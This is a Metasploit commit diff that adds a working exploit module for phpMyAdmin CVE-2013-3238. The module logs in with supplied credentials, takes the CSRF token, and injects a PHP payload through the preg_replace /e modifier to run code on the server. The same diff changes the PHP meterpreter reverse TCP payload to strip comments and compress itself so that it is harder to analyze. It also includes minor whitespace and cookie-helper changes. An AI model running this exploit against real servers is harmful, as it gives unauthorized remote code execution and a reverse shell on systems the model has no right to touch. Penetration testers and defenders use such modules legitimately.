Landing rapid7#1772 - Adds phpMyadmin Preg_Replace module (CVE-2013-3238)

[Closes rapid7#1772]

Author: wchen-r7

data/meterpreter/meterpreter.php

@@ -265,7 +265,7 @@ function core_channel_write($req, &$pkt) {
 }
 
 #
-# This is called when the client wants to close a channel explicitly.  Not to be confused with 
+# This is called when the client wants to close a channel explicitly.  Not to be confused with
 #
 function core_channel_close($req, &$pkt) {
     global $channel_process_map;
@@ -297,7 +297,7 @@ function core_channel_close($req, &$pkt) {
     return ERROR_FAILURE;
 }
 
-# 
+#
 # Destroy a channel and all associated handles.
 #
 function channel_close_handles($cid) {
@@ -578,7 +578,7 @@ function handle_dead_resource_channel($resource) {
 
         # Make sure the provided resource gets closed regardless of it's status
         # as a channel
-        remove_reader($resource); 
+        remove_reader($resource);
         close($resource);
     } else {
         my_print("Handling dead resource: {$resource}, for channel: {$cid}");
@@ -822,7 +822,7 @@ function eof($resource) {
         #
         # See http://us2.php.net/manual/en/function.feof.php , specifically this:
         #   If a connection opened by fsockopen() wasn't closed by the server,
-        #   feof() will hang. To workaround this, see below example: 
+        #   feof() will hang. To workaround this, see below example:
         #     <?php
         #     function safe_feof($fp, &$start = NULL) {
         #     ...
@@ -862,7 +862,7 @@ function read($resource, $len=null) {
     #my_print(sprintf("Reading from $resource which is a %s", get_rtype($resource)));
     $buff = '';
     switch (get_rtype($resource)) {
-    case 'socket': 
+    case 'socket':
         if (array_key_exists((int)$resource, $udp_host_map)) {
             my_print("Reading UDP socket");
             list($host,$port) = $udp_host_map[(int)$resource];
@@ -915,13 +915,13 @@ function read($resource, $len=null) {
                     break;
                 }
             }
-            
+
             if ($resource != $msgsock) { my_print("buff: '$buff'"); }
             $r = Array($resource);
         }
         my_print(sprintf("Done with the big read loop on $resource, got %d bytes", strlen($buff)));
         break;
-    default: 
+    default:
         # then this is possibly a closed channel resource, see if we have any
         # data from previous reads
         $cid = get_channel_id_from_resource($resource);
@@ -948,7 +948,7 @@ function write($resource, $buff, $len=0) {
     #my_print(sprintf("Writing $len bytes to $resource which is a %s", get_rtype($resource)));
     $count = false;
     switch (get_rtype($resource)) {
-    case 'socket': 
+    case 'socket':
         if (array_key_exists((int)$resource, $udp_host_map)) {
             my_print("Writing UDP socket");
             list($host,$port) = $udp_host_map[(int)$resource];
@@ -957,7 +957,7 @@ function write($resource, $buff, $len=0) {
             $count = socket_write($resource, $buff, $len);
         }
         break;
-    case 'stream': 
+    case 'stream':
         $count = fwrite($resource, $buff, $len);
         fflush($resource);
         break;
@@ -1107,7 +1107,7 @@ function remove_reader($resource) {
     case 'socket':
         register_socket($msgsock);
         break;
-    case 'stream': 
+    case 'stream':
         # fall through
     default:
         register_stream($msgsock);
@@ -1156,7 +1156,7 @@ function remove_reader($resource) {
                 if ($request) {
                     write($msgsock, $request);
                 }
-            } 
+            }
         }
     }
     # $r is modified by select, so reset it

lib/rex/proto/http/response.rb

@@ -58,6 +58,28 @@ def initialize(code = 200, message = 'OK', proto = DefaultProtocol)
 		self.count_100 = 0
 	end
 
+	#
+	# Gets cookies from the Set-Cookie header in a format to be used
+	# in the 'cookie' send_request field
+	#
+	def get_cookies
+		cookies = ""
+		if (self.headers.include?('Set-Cookie'))
+			set_cookies = self.headers['Set-Cookie']
+			key_vals = set_cookies.scan(/\s?([^, ;]+?)=(.*?);/)
+			key_vals.each do |k, v|
+				# Dont downcase actual cookie name as may be case sensitive
+				name = k.downcase
+				next if name == 'path'
+				next if name == 'expires'
+				next if name == 'domain'
+				cookies << "#{k}=#{v}; "
+			end
+		end
+
+		return cookies.strip
+	end
+
 	#
 	# Updates the various parts of the HTTP response command string.
 	#

modules/exploits/multi/http/phpmyadmin_preg_replace.rb

@@ -0,0 +1,181 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name' => 'phpMyAdmin Authenticated Remote Code Execution via preg_replace()',
+			'Description' => %q{
+					This module exploits a PREG_REPLACE_EVAL vulnerability in phpMyAdmin's
+					replace_prefix_tbl within libraries/mult_submits.inc.php via db_settings.php
+					This affects versions 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3.
+					PHP versions > 5.4.6 are not vulnerable.
+			},
+			'Author' =>
+				[
+					'Janek "waraxe" Vind', # Discovery
+					'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module
+				],
+			'License' => MSF_LICENSE,
+			'References' =>
+				[
+					[ 'CVE', '2013-3238' ],
+					[ 'PMASA', '2013-2'],
+					[ 'waraxe', '2013-SA#103' ],
+					[ 'EDB', '25003'],
+					[ 'OSVDB', '92793'],
+					[ 'URL', 'http://www.waraxe.us/advisory-103.html' ],
+					[ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2013-2.php' ]
+				],
+			'Privileged' => false,
+			'Platform'   => ['php'],
+			'Arch'       => ARCH_PHP,
+			'Payload'    =>
+				{
+					'BadChars' => "&\n=+%",
+					# Clear out PMA's error handler so it doesn't lose its mind
+					# and cause ENOMEM errors and segfaults in the destructor.
+					'Prepend' => "function foo($a,$b,$c,$d,$e){return true;};set_error_handler(foo);"
+				},
+			'Targets' =>
+				[
+					[ 'Automatic', { } ],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Apr 25 2013'))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
+				OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']),
+				OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
+			], self.class)
+	end
+
+	def check
+		begin
+			res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/js/messages.php') })
+		rescue
+			print_error("Unable to connect to server.")
+			return CheckCode::Unknown
+		end
+
+		if res.code != 200
+			print_error("Unable to query /js/messages.php")
+			return CheckCode::Unknown
+		end
+
+		php_version = res['X-Powered-By']
+		if php_version
+			print_status("PHP Version: #{php_version}")
+			if php_version =~ /PHP\/(\d)\.(\d)\.(\d)/
+				if $1.to_i > 5
+					return CheckCode::Safe
+				else
+					if $1.to_i == 5 and $2.to_i > 4
+						return CheckCode::Safe
+					else
+						if $1.to_i == 5 and $2.to_i == 4 and $3.to_i > 6
+							return CheckCode::Safe
+						end
+					end
+				end
+			end
+		else
+			print_status("Unknown PHP Version")
+		end
+
+		if res.body =~ /pmaversion = '(.*)';/
+			print_status("phpMyAdmin version: #{$1}")
+			case $1.downcase
+				when '3.5.8.1', '4.0.0-rc3'
+					return CheckCode::Safe
+				when '4.0.0-alpha1', '4.0.0-alpha2', '4.0.0-beta1', '4.0.0-beta2', '4.0.0-beta3', '4.0.0-rc1', '4.0.0-rc2'
+					return CheckCode::Vulnerable
+				else
+					if $1.starts_with? '3.5.'
+						return CheckCode::Vulnerable
+					end
+
+					return CheckCode::Unknown
+			end
+		end
+	end
+
+	def exploit
+		uri = target_uri.path
+		print_status("Grabbing CSRF token...")
+		response = send_request_cgi({ 'uri' => uri})
+		if response.nil?
+			fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.")
+		end
+
+		if (response.body !~ /"token"\s*value="([^"]*)"/)
+			fail_with(Exploit::Failure::NotFound, "Couldn't find token. Is URI set correctly?")
+		else
+			print_good("Retrieved token")
+		end
+
+		token = $1
+		post = {
+			'token' => token,
+			'pma_username' => datastore['USERNAME'],
+			'pma_password' => datastore['PASSWORD']
+		}
+
+		print_status("Authenticating...")
+
+		login = send_request_cgi({
+			'method' => 'POST',
+			'uri' => normalize_uri(uri, 'index.php'),
+			'vars_post' => post
+		})
+
+		if login.nil?
+			fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.")
+		end
+
+		token = login.headers['Location'].scan(/token=(.*)[&|$]/).flatten.first
+
+		cookies = login.get_cookies
+
+		login_check = send_request_cgi({
+			'uri' => normalize_uri(uri, 'index.php'),
+			'vars_get' => { 'token' => token },
+			'cookie' => cookies
+		})
+
+		if login_check.body =~ /Welcome to/
+			fail_with(Exploit::Failure::NoAccess, "Authentication failed.")
+		else
+			print_good("Authentication successful")
+		end
+
+		db = rand_text_alpha(3+rand(3))
+		exploit_result = send_request_cgi({
+			'uri'	=> normalize_uri(uri, 'db_structure.php'),
+			'method' => 'POST',
+			'cookie' => cookies,
+			'vars_post' => {
+				'query_type' => 'replace_prefix_tbl',
+				'db' => db,
+				'selected[0]' => db,
+				'token' => token,
+				'from_prefix' => "/e\0",
+				'to_prefix' => payload.encoded,
+				'mult_btn' => 'Yes'
+			}
+		},1)
+	end
+end
+

modules/payloads/singles/php/meterpreter_reverse_tcp.rb

@@ -33,11 +33,12 @@ def generate
 			f.read(f.stat.size)
 		}
 		met.gsub!("127.0.0.1", datastore['LHOST']) if datastore['LHOST']
-		met.gsub!("4444", datastore['LPORT']) if datastore['LPORT']
-		# XXX When this payload is more stable, remove comments and compress
-		# whitespace to make it smaller and a bit harder to analyze
-		#met.gsub!(/#.*$/, '')
-		#met = Rex::Text.compress(met)
+		met.gsub!("4444", datastore['LPORT'].to_s) if datastore['LPORT']
+
+		# remove comments and compress whitespace to make it smaller and a
+		# bit harder to analyze
+		met.gsub!(/#.*$/, '')
+		met = Rex::Text.compress(met)
 		met
 	end
 end